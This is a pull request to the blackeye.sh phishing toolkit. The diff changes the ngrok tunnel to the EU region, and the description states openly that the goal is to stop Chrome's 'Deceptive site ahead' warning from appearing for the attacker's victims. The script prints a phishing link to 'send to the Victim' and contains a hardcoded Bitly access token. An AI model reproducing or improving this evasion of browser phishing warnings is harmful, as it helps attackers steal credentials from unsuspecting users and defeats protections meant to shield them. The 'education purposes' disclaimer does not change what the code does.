### PR TITLE
Region EU (google chrome - Deceptive site ahead fix)

### DIFF
--- a/blackeye.sh
+++ b/blackeye.sh
@@ -402,10 +402,10 @@ printf "\e[1;92m[\e[0m*\e[1;92m] Starting php server...\n"
 cd sites/$server && php -S 127.0.0.1:5555 > /dev/null 2>&1 & 
 sleep 2
 printf "\e[1;92m[\e[0m*\e[1;92m] Starting ngrok server...\n"
-./ngrok http 127.0.0.1:5555  > /dev/null 2>&1 &
-sleep 10
+./ngrok http --region eu 127.0.0.1:5555  > /dev/null 2>&1 &
+sleep 5
 
-link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io")
+link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.eu.ngrok.io")
 printf "\e[1;92m[\e[0m*\e[1;92m] Send this link to the Victim:\e[0m\e[1;77m %s\e[0m\n" $link
 Accesstoken=433bdc6028d67bba06cf95286e923cde8c0906c7
 api=https://api-ssl.bitly.com/v4/shorten


### PR DESCRIPTION
Just added EU REGION into the ngrok server properties so in GOOGLE CHROME it will not show the red "dangerous site link" sign before accesing LIKE THIS --->  (via Picture)
![letsgo](https://user-images.githubusercontent.com/85997825/153009491-8d281884-b4f0-40a4-aaf2-e8e36b045eb1.PNG)
with my PR it won't ever bother you or your victims. (disclaimer : education purporses only)
it is just for the first "NGROK" option